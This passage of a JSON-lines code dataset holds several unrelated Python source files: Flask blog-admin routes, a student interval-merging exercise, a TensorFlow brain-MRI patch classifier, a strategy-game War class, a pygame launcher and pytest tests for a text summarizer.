blog\n@blog.route('')\n@dfm_mode_checker\ndef blog_index():\n all_posts = db.session.query(BlogPost).order_by(BlogPost.id.desc()).limit(5)\n return render_template('cms/blog/index.html', posts=all_posts, user=User)\n\n\n# View route for specific posts in category\n@blog.route('/category/')\n@dfm_mode_checker\ndef posts_in_category(category):\n posts_in_cat = db.session.query(BlogPost).order_by(BlogPost.id.desc())\n results = []\n for post in posts_in_cat:\n if post.category.category_url == category:\n results.append((post.post_by, post.post_url, post.post_title, post.post_date))\n\n return render_template('cms/blog/list.html', posts=results, user=User, category=category)\n\n\n##################\n# Administration #\n##################\n\n# Blog admin index\n@blog.route('/admin')\n@cms_access_required\ndef blog_overview():\n return render_template('cms/blog/admin/index.html', posts=db.session.query(BlogPost))\n\n\n# New post\n@blog.route('/admin/new', methods=['GET', 'POST'])\n@cms_access_required\ndef new_blog_post():\n form = forms.BlogPost(request.form)\n categories = db.session.query(PostCategories)\n\n if form.validate_on_submit():\n try:\n post_by = current_user.id\n post_date = str(time.strftime(\"%m-%d-%Y\"))\n post_title = form.post_title.data.decode('unicode_escape').encode('ascii', 'ignore')\n post_url = form.post_url.data.lower().decode('unicode_escape').encode('ascii', 'ignore').replace(\" \",\n \"-\").lower()\n post_content = form.post_content.data.decode('unicode_escape').encode('ascii', 'ignore')\n post_category = request.form['post_category'].decode('unicode_escape').encode('ascii', 'ignore')\n\n new_post = BlogPost(post_date, post_by, post_url, post_title, post_content, post_category)\n db.session.add(new_post)\n db.session.commit()\n new_post_to_file(new_post.id, post_date, post_by, post_url, post_title, post_content, post_category)\n\n category = db.session.query(PostCategories).filter(PostCategories.id == post_category).first().category_url\n\n return redirect('/blog/{0}/{1}'.format(category, post_url))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/new-post.html', form=form, categories=categories)\n\n\n# Edit post given post_id\n@blog.route('/admin/edit/', methods=['GET', 'POST'])\n@cms_access_required\ndef edit_post(post_id):\n form = forms.BlogPost()\n post = db.session.query(BlogPost).filter(BlogPost.id == post_id).first()\n categories = db.session.query(PostCategories)\n\n if form.validate_on_submit():\n try:\n title = form.post_title.data.decode('unicode_escape').encode('ascii', 'ignore')\n url = form.post_url.data.lower().decode('unicode_escape').encode('ascii', 'ignore').replace(\" \",\n \"-\").lower()\n content = request.form['post_content'].decode('unicode_escape').encode('ascii', 'ignore')\n category = request.form['post_category'].decode('unicode_escape').encode('ascii', 'ignore')\n\n old_url = post.post_url\n\n post.post_title = title\n post.post_url = url\n post.post_category = category\n post.post_content = content\n db.session.commit()\n\n updated_post_to_file(post.id, old_url, post.post_date, post.post_by, url, title, content,\n category)\n\n category_url = db.session.query(PostCategories).filter(PostCategories.id == category).first().category_url\n\n return redirect('/blog/{0}/{1}'.format(category_url, url))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/edit-post.html', post=post, form=form, categories=categories)\n\n\n# Delete post given post_id\n@blog.route('/admin/delete/', methods=['GET'])\n@cms_access_required\ndef delete_post(post_id):\n try:\n post_to_delete = db.session.query(BlogPost).filter(BlogPost.id == post_id).first()\n os.remove('{0}/MORTWebsite/templates/render-files/blog-post/{1}/{2}.html'.format(\n os.environ.get('APPLICATION_ROOT'), post_to_delete.category.category_url, post_to_delete.post_url))\n db.session.delete(post_to_delete)\n db.session.commit()\n except:\n db.session.rollback()\n flash(\"Error deleting!\")\n\n return redirect(url_for('blog.blog_overview'))\n\n\n# List overview of all available blog categories and their URLs\n@blog.route('/admin/categories')\n@cms_access_required\ndef categories_overview():\n return render_template('cms/blog/admin/categories/index.html', categories=db.session.query(PostCategories))\n\n\n# Route to add a new blog category\n@blog.route('/admin/add-category', methods=['GET', 'POST'])\n@cms_access_required\ndef add_category():\n form = forms.CategoryForm()\n\n if form.validate_on_submit():\n try:\n category_name = form.category_name.data\n category = PostCategories(category_name)\n db.session.add(category)\n db.session.commit()\n log_event('INFO', '{0} added new blog category titled \"{1}\"'.format(current_user.username, category_name))\n return redirect(url_for('blog.categories_overview'))\n except:\n db.session.rollback()\n flash(\"Error adding category!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/categories/new-category.html', form=form)\n\n\n# Edit blog category given category_id\n@blog.route('/admin/edit-category/', methods=['GET', 'POST'])\n@cms_access_required\ndef edit_category(category_id):\n form = forms.CategoryForm()\n category = db.session.query(PostCategories).filter(PostCategories.id == category_id).first()\n\n if form.validate_on_submit():\n try:\n category_name = form.category_name.data\n\n category.category_name = category_name\n db.session.commit()\n\n log_event('INFO', '{0} updated blog category titled \"{1}\"'.format(current_user.username, category_name))\n return redirect(url_for('blog.categories_overview'))\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n else:\n flash_errors(form)\n\n return render_template('cms/blog/admin/categories/edit-category.html', form=form, category=category)\n\n\n# Delete blog category given category_id\n@blog.route('/admin/delete-category/', methods=['GET'])\n@cms_access_required\ndef delete_category(category_id):\n try:\n category_to_delete = db.session.query(PostCategories).filter(PostCategories.id == category_id).first()\n db.session.delete(category_to_delete)\n db.session.commit()\n except:\n db.session.rollback()\n flash(\"Unknown database error!\")\n\n return redirect(url_for('blog.categories_overview'))\n\n\n# Edit raw HTML for featured categories sidebar\n@blog.route('/admin/edit-featured-categories', methods=['GET', 'POST'])\n@cms_admin_required\ndef edit_featured_categories():\n if request.method == 'GET':\n page = open('MORTWebsite/templates/cms/blog/featured-categories.html', 'r')\n data = page.read()\n return render_template('cms/editor.html', data=data)\n else:\n page = open('MORTWebsite/templates/cms/blog/featured-categories.html', 'w+')\n content = request.form['content']\n page.write(content)\n return redirect(url_for('blog.blog_overview'))\n","sub_path":"MORTWebsite/routing/cms/blog/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"178666128","text":"# File: Intervals.py\r\n\r\n# Description: Making collapsed intervals in order of size\r\n\r\n# Student Name: Raymond Li\r\n\r\n# Student UT EID: rll2497\r\n\r\n# Partner Name: Kevin Huang\r\n\r\n# Partner UT EID: Kjh2755\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 50205\r\n\r\n# Date Created: 9/6\r\n\r\n# Date Last Modified: 9/9\r\ndef sortList(IntervalList):\r\n sortedList = []\r\n while len(IntervalList) > 0:\r\n pos = 0\r\n minValue = IntervalList[pos][0]\r\n for i in range(len(IntervalList)):\r\n if IntervalList[i][0] < minValue:\r\n minValue = IntervalList [i][0]\r\n pos = i\r\n sortedList.append((IntervalList[pos][0],IntervalList[pos][1]))\r\n IntervalList.pop(pos)\r\n return sortedList\r\n\r\ndef get_non_intersecting_intervals(sortedList):\r\n len_of_list = len(sortedList)\r\n nonIntervalList = []\r\n pos = 0\r\n print(\"Non-intersecting Intervals:\")\r\n while pos < len_of_list:\r\n nextPosition = pos + 1\r\n minVal = sortedList[pos][0]\r\n maxVal = sortedList[pos][1]\r\n while nextPosition < len_of_list and sortedList[nextPosition][0] <= maxVal:\r\n if minVal > sortedList[nextPosition][0]:\r\n minVal = sortedList[nextPosition][0]\r\n if maxVal < sortedList[nextPosition][1]:\r\n maxVal = sortedList[nextPosition][1]\r\n nextPosition = nextPosition + 1\r\n nonIntervalList.append([minVal,maxVal])\r\n print('(' + str(minVal) + ', ' + str(maxVal) + ')')\r\n pos = nextPosition\r\n print(\"\") \r\n \r\n return nonIntervalList\r\n\r\ndef order_by_range(nonIntervalList):\r\n print(\"Non-intersecting Intervals in order of size:\")\r\n while len(nonIntervalList) > 0:\r\n pos = 0\r\n difference = nonIntervalList[pos][1] - nonIntervalList[pos][0]\r\n for i in range(len(nonIntervalList)):\r\n if nonIntervalList[i][1] - nonIntervalList[i][0] < difference:\r\n difference = nonIntervalList[i][1] - nonIntervalList[i][0]\r\n pos = i\r\n print('(' + str(nonIntervalList[pos][0]) + ', ' + str(nonIntervalList[pos][1]) + ')')\r\n nonIntervalList.pop(pos)\r\n \r\ndef main():\r\n\r\n inf = open(\"intervals.txt\",\"r\")\r\n \r\n IntervalList = []\r\n line = inf.readline()\r\n\r\n while line != \"\":\r\n\r\n LineArray = line.strip('\\n').split(\" \")\r\n IntervalList.append((int(LineArray[0]),int(LineArray[1])))\r\n line = inf.readline()\r\n \r\n inf.close()\r\n #sorting \r\n newList = sortList(IntervalList)\r\n #make intervals\r\n intervalList = get_non_intersecting_intervals(newList)\r\n #put in order of size\r\n order_by_range(intervalList)\r\n \r\n \r\n \r\n\r\nmain()","sub_path":"Intervals.py","file_name":"Intervals.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"528436267","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport SimpleITK as sitka\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom scipy.sparse import coo_matrix\nfrom sklearn.utils import shuffle\nimport os\nfrom scipy.spatial.distance import dice\n\n\n# ## Predspracovanie dat\n\n# In[2]:\n\n\nsize = 15\nstep = 5\npad = 5\nvolumes = 75 # 75 volumes\npatches = [[],[],[],[],[]]\nvalid_x = [[],[],[],[],[]]\nvalid_y = [[],[],[],[],[]]\nlabels = [[],[],[],[],[]]\nsamples = 0\n\n\n# In[3]:\n\n\nd = [x[0] for x in os.walk('F:\\miccai_data\\MICCAI_BraTS17_Data_Training\\LGG')][1:]\n\n\nprint('init')\n#scaler_t = True\n#scaler = StandardScaler()\nfor sample in d:\n #Nacitanie obrazovu\n image = [sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_flair.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t1.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t1ce.nii.gz', sitka.sitkFloat32)),\n sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_t2.nii.gz', sitka.sitkFloat32))]\n seg = sitka.GetArrayFromImage(sitka.ReadImage(sample + '\\\\' + sample.split('\\\\')[-1] + '_seg.nii.gz', sitka.sitkInt32))\n #zmena formatu z NCHW na NHWC\n image = np.swapaxes(np.reshape(image, (4, 155*240*240)), 0,1)\n image = np.reshape(image, (155,240,240, 4))\n\n #Padding\n if pad != 0:\n image = np.lib.pad(image, pad_width=((pad, pad), (pad, pad), (pad, pad), (0, 0)),\n mode='constant',\n constant_values=(image[0][0][0][0]))\n\n\n seg = np.lib.pad(seg,\n pad_width=((pad, pad), (pad, pad), (pad, pad)),\n mode='constant',\n constant_values=(seg[0][0][0]))\n #Vytvorenie patchov\n for s in range(0, 155+2*pad-size+1, step):\n for h in range(0, 240+2*pad-size+1, step):\n for w in range(0, 240+2*pad-size+1, step):\n patch = image[s:size+s, h:h+size, w:size+w, :]\n if patch[size//2,size//2,size//2,:].max() != 0:\n lab = seg[s+pad:s+pad+step, h+pad:h+pad+step, w+pad:w+pad+step]\n lab = np.bincount(lab.reshape(-1)).argmax()\n patches[lab] += [patch]\n samples += 1\n\nprint(samples, 'samples')\nprint('end')\n\n\n# # Rozdelenie na trenovaciu a validacnu sadu\n\n# In[4]:\n\n\nfor x in range(5):\n if x > 0:\n label = [1]*len(patches[x])\n else:\n label = [0]*len(patches[x])\n patches[x], valid_x[x], labels[x], valid_y[x] = train_test_split(patches[x], label, test_size=0.2, random_state=42)\n\n\n\n# In[5]:\n\n\nfor x in range(5):\n print(len(patches[x]))\n print(len(valid_x[x]))\n\n\n# In[6]:\n\n\npatches[0] = patches[0][:500000]\nlabels[0] = labels[0][:500000]\nvalid_x[0] = valid_x[0][:15000]\nvalid_y[0] = valid_y[0][:15000]\nfor x in range(1,5):\n for y in range(len(labels[x])):\n if x == 4:\n k = 15\n else:\n k = 8\n patches[x] += [patches[x]]*k\n labels[x] += [labels[x]]*k\n\n\n# In[7]:\n\n\nfor x in range(5):\n print(len(patches[x]))\n print(len(valid_x[x]))\n\npatches = patches[0] + patches[1] + patches[2] + patches[4]\nlabels = labels[0] + labels[1] + labels[2] + labels[4]\n\nvalid_x = valid_x[0] + valid_x[1] + valid_x[2] + valid_x[4]\nvalid_y = valid_y[0] + valid_y[1] + valid_y[2] + valid_y[4]\n\nprint(np.shape(valid_x))\nprint(len(patches))\nprint(np.shape(patches[0]))\n\n\n# In[ ]:\n\n\npatches, labels = shuffle(patches, labels, random_state=13)\ndata_x = []\ndata_y = []\nbatch_size = 16\nwhile len(patches) > 0 :\n print('k')\n if len(patches) > batch_size:\n data_x += [np.array(patches[:batch_size])]\n data_y += [np.array(labels[:batch_size]).reshape(-1,1)]\n else:\n data_x += [np.array(patches[:])]\n data_y += [np.array(labels[:]).reshape(-1,1)]\n print('k')\n patches = patches[batch_size:]\n labels = labels[batch_size:]\n\nprint('data ready')\nprint(len(data_x))\n# In[8]:\n\n\ndef get_batch(data_x, data_y, batch_size=128):\n data_x, data_y = shuffle(data_x, data_y, random_state=0)\n data_y = np.reshape(data_y, (-1, 1))\n for x in range(((data_y.shape[0]+batch_size-1)//batch_size)):\n if (x+1)*batch_size > data_y.shape[0]:\n yield data_x[x*batch_size:], np.reshape(data_y[x*batch_size:], (-1, 1))\n else:\n yield data_x[x*batch_size:(x+1)*batch_size], np.reshape(data_y[x*batch_size:(x+1)*batch_size], (-1, 1))\n\n\n\n# In[9]:\n\n\ndef get_result_batch(data_x, batch_size=128):\n data_x = np.array(data_x)\n for x in range(((data_x.shape[0]+batch_size-1)//batch_size)):\n if (x+1)*batch_size > data_x.shape[0]:\n yield data_x[x*batch_size:]\n else:\n yield data_x[x*batch_size:(x+1)*batch_size]\n\n\n# In[10]:\n\n\nsess = tf.Session()\n\n\n# In[11]:\n\n\n# Training Parameters\nlearning_rate = 0.001\nnum_steps = 1\nbatch_size = 128\ndisplay_step = 10\n\n# Network Parameters\nnum_input = 15 # input shape is (5, 5, 5)\ninput_dim = 15*4 # dimesion of MRI - 5\nnum_classes = 2 # tumor classes is 2 (0 - nontumor, 1 tumor)\ndropout = 0.75 # Dropout, probability to keep units\n\n# tf Graph input\nX = tf.placeholder(tf.float32, [None, num_input, num_input, num_input, 4], name=\"INPUT\")\nY = tf.placeholder(tf.int32, [None, 1], name=\"OUTPUT\")\nkeep_prob = tf.placeholder(tf.float32, name=\"dropOut\") # dropout (keep probability)\n\n\n# Create some wrappers for simplicity\ndef conv3d(x, W, b, strides=[1, 1, 1, 1, 1]):\n # Conv2D wrapper, with bias and relu activation\n x = tf.nn.conv3d(x, W, strides=strides, padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n\n# Create some wrappers for simplicity\ndef conv2d(x, W, b, strides=[1, 1, 1, 1]):\n # Conv2D wrapper, with bias and relu activation\n x = tf.nn.conv2d(x, W, strides=strides, padding='SAME')\n x = tf.nn.bias_add(x, b)\n return tf.nn.relu(x)\n\n#\n# def maxpool2d(x, k=2):\n# # MaxPool2D wrapper\n# return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],\n# padding='SAME')\n\n\n# 3,3,3 vs 3,3\n\n# Create model\ndef conv_net(x, weights, biases, dropout):\n # Reshape to match picture format [Height x Width x Channel]\n # Tensor input become 4-D: [Batch Size, Height, Width, Channel]\n x = tf.reshape(x, shape=[-1, size, size, size*4]) # nemohlo sa to pomiesat?\n\n # Convolution Layer\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\n\n # Convolution Layer\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\n\n # Convolution Layer\n conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])\n conv4 = conv2d(conv3, weights['wc4'], biases['bc4'])\n\n # Fully connected layer\n # Reshape conv2 output to fit fully connected layer input\n fc1 = tf.reshape(conv4, [-1, size*size*254])\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\n fc1 = tf.nn.relu(fc1)\n # Apply Dropout\n fc1 = tf.nn.dropout(fc1, dropout)\n\n # Output, class prediction\n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\n return out\n\n\n\n# Store layers weight & bias\nweights = {\n # 5x5 conv, 1 input, 32 outputs\n 'wc1': tf.Variable(tf.random_normal([3, 3, 60, 64])),\n # 5x5 conv, 32 inputs, 64 outputs\n 'wc2': tf.Variable(tf.random_normal([3, 3, 64, 128])),\n # 5x5 conv, 64 inputs, 128 outputs\n 'wc3': tf.Variable(tf.random_normal([3, 3, 128, 192])),\n # 5x5 conv, 64 inputs, 128 outputs\n 'wc4': tf.Variable(tf.random_normal([3, 3, 192, 254])),\n # 5x5 conv, 64 inputs, 128 outputs\n # fully connected, inputs, 1024 outputs\n 'wd1': tf.Variable(tf.random_normal([size*size*254, 512])),\n # 1024 inputs, 10 outputs (class prediction)\n 'out': tf.Variable(tf.random_normal([512, num_classes]))\n}\n\nbiases = {\n 'bc1': tf.Variable(tf.random_normal([64])),\n 'bc2': tf.Variable(tf.random_normal([128])),\n 'bc3': tf.Variable(tf.random_normal([192])),\n 'bc4': tf.Variable(tf.random_normal([254])),\n 'bd1': tf.Variable(tf.random_normal([512])),\n 'out': tf.Variable(tf.random_normal([num_classes]))\n}\n\n# Construct model\nlogits = conv_net(X, weights, biases, keep_prob)\nprediction = tf.nn.softmax(logits)\noutput = tf.argmax(prediction, 1)\n\n# Define loss and optimizer\nloss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=logits, labels=tf.one_hot(Y,2)))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n\n# Evaluate model\ncorrect_pred = tf.equal(output, tf.argmax(tf.one_hot(Y, 2), 2))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n#acc, acc_op = tf.metrics.accuracy(labels=tf.argmax(tf.one_hot(Y, 5), 0), predictions=tf.argmax(prediction,0))\n\n\n# Initialize the variables (i.e. assign their default value)\ninit = tf.global_variables_initializer()\nprint('Graph created')\n\n\n# In[12]:\n\n\nsess.run(init)\nprint('init')\n\n\n# In[13]:\n\n\nprint(sess.run(output, {X:patches[0:4], Y:np.reshape(labels[0:4], (-1,1)), keep_prob: 0.8}))\n\n\n# In[ ]:\n\n\nprint('start')\n#TRAINING\nfor step in range(5):\n print('Epoch:', step)\n # Run optimization op (backprop)\n i = 0\n for batch_x, batch_y in get_batch(patches, labels, batch_size=16):\n print('k')\n sess.run(train_op, {X: batch_x,\n Y: batch_y,\n keep_prob: 0.7})\n\n if i % 100 == 0:\n accccu = sess.run(accuracy, {X: batch_x, Y:batch_y, keep_prob:1.0})\n acc = 0\n loss = 0\n g = 0\n for batch_xx, batch_yy in get_batch(valid_x[step*60000:(step+1)*60000], valid_y[step*60000:(step+1)*60000],\n batch_size=16):\n g +=1\n acc_c, loss_c = sess.run([accuracy, loss_op], {X: batch_xx, Y: batch_yy, keep_prob: 1})\n acc += acc_c\n loss += loss_c\n print('Average accurtacy of valid:', '{:.4f}'.format(acc/g),\n 'Loss: ', '{:.4f}'.format(loss/g),\n 'Actual batch acc: ', '{:.4f}'.format(accccu))\n i += 1\n\n # print(batch_y)\n # print(sess.run(prediction, {X:batch_x, keep_prob: 1}))\n\nprint('end')\n\n\n# In[ ]:\n\n\nout = []\nfor batch_x in get_result_batch(patches, batch_size=100):\n i += 1\n out_c = sess.run(output, {X: batch_x, keep_prob: 1})\n #print(\"Step \", i,\", Minibatch Loss= \" + \"{:.4f}\".format(loss) + \", Training Accuracy= \" + \"{:.3f}\".format(acc))\n out = np.append(out, out_c)\n\n\n\n# In[ ]:\n\n\nprint(np.shape(patches))\n\n\n# In[ ]:\n\n\nf1_score(valid_y, out, average='macro')\n\n\n# In[ ]:\n\n\nres = 0\nfor x in range(np.shape(label)[0]):\n if out[x] == label[x]:\n res += 1\n\nprint(res/np.shape(out)[0])\n\n\n# In[ ]:\n\n\nfor x in range(np.shape(label)[0]):\n if label[x] != 0:\n print(out[x], label[x])\n\n\n# In[ ]:\n\n\nfor x in range(np.shape(label)[0]):\n print(label[x])\n","sub_path":"iit_src/RegionCNN-clasfy/iit_src.py","file_name":"iit_src.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"553278346","text":"'''\nCopyright (c) 2012-2015, Matthieu Nué\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, \nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR \nPURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR \nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \nEXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT \nOF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS \nINTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN \nCONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) \nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF \nTHE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nimport heyaml\nfrom decorators import *\nfrom functions import *\n\n@visible(aggressors='for_all', defenders='for_all')\n@relations(aggressors=\"country\", defenders=\"country\")\nclass War(heyaml.HEYAMLObject):\n yaml_tag = '!War'\n def new_yaml(self, idd, aggressors, defenders):\n self.idd = idd\n self._aggressors = aggressors \n self.aggressors = []\n self._defenders = defenders\n self.defenders = []\n self.battles = set()\n \n def new(self, idd, aggressors, defenders):\n self.idd = idd\n self._aggressors = [] \n self.aggressors = aggressors\n self._defenders = []\n self.defenders = defenders\n self.battles = set()\n War.changed_attribute[\"aggressors\"].add(self.idd)\n War.changed_attribute[\"defenders\"].add(self.idd)\n self.init()\n \n def init(self):\n for aggressor in self.aggressors:\n aggressor.add_war_aggressor(self)\n for defender in self.defenders:\n defender.add_war_defender(self)\n \n def delete(self):\n for aggressor in self.aggressors:\n aggressor.remove_war_aggressors(self)\n for defender in self.defenders:\n defender.remove_war_defenders(self)\n callback = []\n for battle in self.battles:\n callback.append((\"delete_battle\",(battle)))\n return callback\n \n def add_aggressor(self, country):\n self.aggressors.append(country)\n War.changed_attribute[\"aggressors\"].add(self.idd)\n return self.aggressors\n \n def remove_aggressor(self, country):\n self.aggressors.remove(country)\n War.changed_attribute[\"aggressors\"].add(self.idd)\n return self.aggressors\n\n def add_defender(self, country):\n self.defenders.append(country)\n War.changed_attribute[\"defenders\"].add(self.idd)\n return self.defenders\n \n def remove_defender(self, country):\n self.defenders.remove(country)\n War.changed_attribute[\"defenders\"].add(self.idd)\n return self.defenders\n \n def add_battle(self, battle):\n self.battles.add(battle)\n return self.battles\n \n def remove_battle(self, battle):\n self.battles.remove(battle)\n return self.battles\n \n def get_allies(self, country):\n for c in self.aggressors:\n if c == country:\n return self.aggressors\n for c in self.defenders:\n if c == country:\n return self.defenders\n return []\n \n def get_enemies(self, country):\n for c in self.aggressors:\n if c == country:\n return self.defenders\n for c in self.defenders:\n if c == country:\n return self.aggressors\n return []\n \n","sub_path":"src/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"137824344","text":"import pygame\nimport sys\nimport pglobals as g\nfrom scenes import opening\nimport pygame.freetype\nimport math\n\ng.init()\n\nglobalClock = pygame.time.Clock()\n\nscreenSize = width, height = g.screenWidth, g.screenHeight\nFPS = 60\n\npygame.init()\npygame.mixer.init()\n\ntitleFont = pygame.freetype.Font(\"assets/misc/titleFont.ttf\", 120)\npokemonLogo = pygame.image.load(\"assets/images/pokemonLogo.png\")\nscreen = pygame.display.set_mode((width, height))\nstartMenu = True\n\nif __name__ == \"__main__\":\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n pygame.mixer.music.load(\"assets/audio/intro2.mp3\")\n pygame.mixer.music.play()\n if startMenu == True:\n opening.main(screen, g, titleFont, pygame.transform.scale(pokemonLogo, (math.floor(pokemonLogo.get_size()[0]/3.5), math.floor(pokemonLogo.get_size()[1]/3.5))), pygame.image.load(\"assets/images/missingTex.png\"))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"521951347","text":"\"\"\"Test `ScoredSentence`\"\"\"\nimport typing\n\nimport kinda\n\nfrom src.oolongt.summarizer.scored_sentence import (\n ScoredSentence, calc_decile, score_keyword_frequency, score_position,\n score_total)\nfrom tests.helpers import check_exception\nfrom tests.params.summarizer import (\n get_inst_comp, param_calc_decile, param_comp, param_score_position,\n param_scored_sentence___init__, param_scored_sentence__init_,\n param_scored_sentence__repr__, param_scored_sentence__str__,\n param_sentences)\nfrom tests.typings import Sample, SampleSentence\n\n\n@param_calc_decile()\ndef test_calc_decile(\n index: int,\n total: int,\n expected: typing.Union[int, Exception]):\n \"\"\"Test `calc_decile` in summarizer subpackage\n\n Arguments:\n index {int} -- index of sentence position (0-based)\n total {int} -- total number of sentences\n expected {typing.Union[int, Exception]} --\n decile of position (0-9) or error\n \"\"\"\n try:\n received = calc_decile(index, total)\n\n except Exception as err: # pylint: disable=broad-except\n received = check_exception(err, expected)\n\n assert received == expected\n\n\n@param_score_position()\ndef test_score_position(index: int, expected: typing.Union[float, Exception]):\n \"\"\"Test `score_position` in summarizer subpackage\n\n Arguments:\n index {int} -- index of sentence position (0-based)\n expected {typing.Union[float, Exception]} -- position score or error\n \"\"\"\n total = 1000\n\n try:\n received = score_position(index, total)\n test = kinda.eq(received, expected)\n\n except Exception as err: # pylint: disable=broad-except\n received = check_exception(err, expected)\n test = (received == expected)\n\n assert test\n\n\n# pylint: disable=unused-argument\n@param_sentences()\ndef test_score_keyword_frequency(sample: Sample, sentence: SampleSentence):\n \"\"\"Test `score_keyword_frequency` in summarizer subpackage\n\n Arguments:\n sample {Sample} -- sample content\n sentence {SampleSentence} -- sentence from sample\n \"\"\"\n expected = sentence.keyword_score\n received = score_keyword_frequency(sentence.dbs_score, sentence.sbs_score)\n\n assert kinda.eq(received, expected)\n\n\n@param_sentences()\ndef test_score_total(sample: Sample, sentence: SampleSentence):\n \"\"\"Test `score_total` in summarizer subpackage\n\n Arguments:\n sample {Sample} -- sample content\n sentence {SampleSentence} -- sentence from sample\n \"\"\"\n expected = sentence.total_score\n received = score_total(\n sentence.title_score, sentence.keyword_score,\n sentence.length_score, sentence.position_score)\n\n assert kinda.eq(received, expected)\n# pylint: enable=unused-argument\n\n\n# pylint: disable=no-self-use\nclass TestScoredSentence:\n \"\"\"Test `ScoredSentence`\"\"\"\n @param_scored_sentence__init_()\n def test__init_(self, init: list, expected: list):\n \"\"\"Test `ScoredSentence` initialization\n\n Arguments:\n init {list} -- initialization parameters\n expected {list} -- expected property values\n \"\"\"\n inst = ScoredSentence('', *range(6))\n inst._init_(*init) # pylint: disable=protected-access\n received = get_inst_comp(inst)\n\n assert received == expected\n\n @param_scored_sentence___init__()\n def test___init__(self, init: list, expected: list):\n \"\"\"Test `ScoredSentence` initialization\n\n Arguments:\n init {list} -- initialization parameters\n expected {list} -- expected property values\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = get_inst_comp(inst)\n\n assert received == expected\n\n @param_scored_sentence__str__()\n def test___str__(self, init: list, expected: str):\n \"\"\"Test `ScoredSentence` string cast\n\n Arguments:\n init {list} -- initialization parameters\n expected {str} -- expected value\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = str(inst)\n\n assert received == expected\n\n @param_scored_sentence__repr__()\n def test___repr__(self, init: list, expected: str):\n \"\"\"Test `ScoredSentence` REPR\n\n Arguments:\n init {list} -- initialization parameters\n expected {str} -- expected value\n \"\"\"\n inst = ScoredSentence(*init[:-3])\n received = repr(inst)\n\n assert received == expected\n\n # pylint: disable=unused-argument\n @param_comp()\n def test___eq__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` equality\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n sent_b {ScoredSentence} -- sentence B\n is_lt {bool} -- sentence A is Less Than sentence B\n is_eq {bool} -- sentence A is EQual to sentence B\n \"\"\"\n expected = is_eq\n received = sent_a == sent_b\n\n assert received == expected\n\n @param_comp()\n def test___lt__(\n self,\n sent_a: ScoredSentence,\n sent_b: ScoredSentence,\n is_lt: bool,\n is_eq: bool):\n \"\"\"Test `ScoredSentence` less-than\n\n Arguments:\n sent_a {ScoredSentence} -- sentence A\n 